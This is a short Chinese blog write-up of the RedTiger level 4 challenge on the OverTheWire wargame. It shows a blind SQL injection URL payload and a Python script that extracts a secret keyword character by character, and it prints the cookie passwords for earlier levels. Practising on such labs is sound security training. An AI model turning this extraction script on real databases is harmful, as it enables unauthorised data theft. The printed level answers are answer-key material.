Redtiger题目

Word count: 260 / Reading time: 1 min

 2018/03/16   Share

0x00 题记

参考了哈士奇师傅的博客 (http://lucifaer.com/index.php/archives/19/) 研究了redtiger的一道盲注题地址 (http://redtiger.labs.overthewire.org/level4.php)

0x01

首先这道题目是需要前一道题的cookie的，通过题目的回显，可以判断是一道盲注型的sql注入题。先判断keyword的长度。
http://redtiger.labs.overthewire.org/level4.php?id=0%20union%20select%201,keyword%20from%20level4_secret%20where%20length(keyword)=21--+ 经判断，keyword长度是21。然后我们写一个python脚本

import requests
url = "http://redtiger.labs.overthewire.org/level4.php"
keyword = []
payload = {'id':'1'}
cookies = { "level2login": "4_is_not_random",
    "level3login": "feed_your_cat_before_your_cat_feeds_you",
    "level4login": "there_is_no_bug"
            }
url =requests.get(url,cookies=cookies,params=payload)
i=1               #i是keyword的长度
while i<=21:
    for j in range(48, 127):
        poc = url.url + ' and ascii(substr((select keyword from level4_secret),' + str(i) + ',1))=' + str(j) + '--+'
        target = requests.get(poc,cookies=cookies)
        if "Query returned 1 rows."in target.text:         #判断回显是否正常
                print(str(i)+':'+chr(j))
                keyword.append(chr(j))
                break
    i += 1
print(keyword)

用的是遍历，速度还是有一点慢的。最后可以看到结果
keyword

原文作者: Hu3sky

原文链接: http://yoursite.com/2018/03/16/redtiger level4/

发表日期: March 16th 2018, 6:13:00 pm

Next Post

VehicleWorkshop上传漏洞本地复现
Previous Post

会员日Pwnhub题目的复现

CATALOG

1. 0x00 题记
2. 0x01

